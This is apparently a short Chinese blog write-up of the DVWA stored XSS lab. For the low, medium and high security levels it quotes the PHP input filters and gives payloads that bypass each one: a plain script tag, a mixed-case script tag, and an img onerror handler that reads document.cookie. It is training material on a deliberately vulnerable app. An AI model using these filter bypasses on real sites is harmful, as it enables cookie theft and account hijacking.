low
无验证,Massage直接注入
<script>alert(document.cookie)</script>
medium
查看源码发现Name只过滤了<scrpit>标签
$name = str_replace( '<script>', '', $name );
绕过思路:HTML页面修改Name的最大输入长度,注入Name,注入script大写
<input name="txtName" type="text" size="30" maxlength="100">
<Script>alert(document.cookie)</script>
high
查看源码,可发现Name只用正则过滤了
$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );
绕过思路:HTML页面修改Name的最大输入长度,注入Name,注入换一种标签,这里用img
<img src=1 onerror=alert(document.cookie)>
本文探讨了不同安全级别下对用户输入进行过滤的方法及其存在的漏洞。具体包括low、medium、high三种安全级别的防御手段及绕过策略,如使用大写字母标签和替代标签等。
2797

被折叠的 条评论
为什么被折叠?



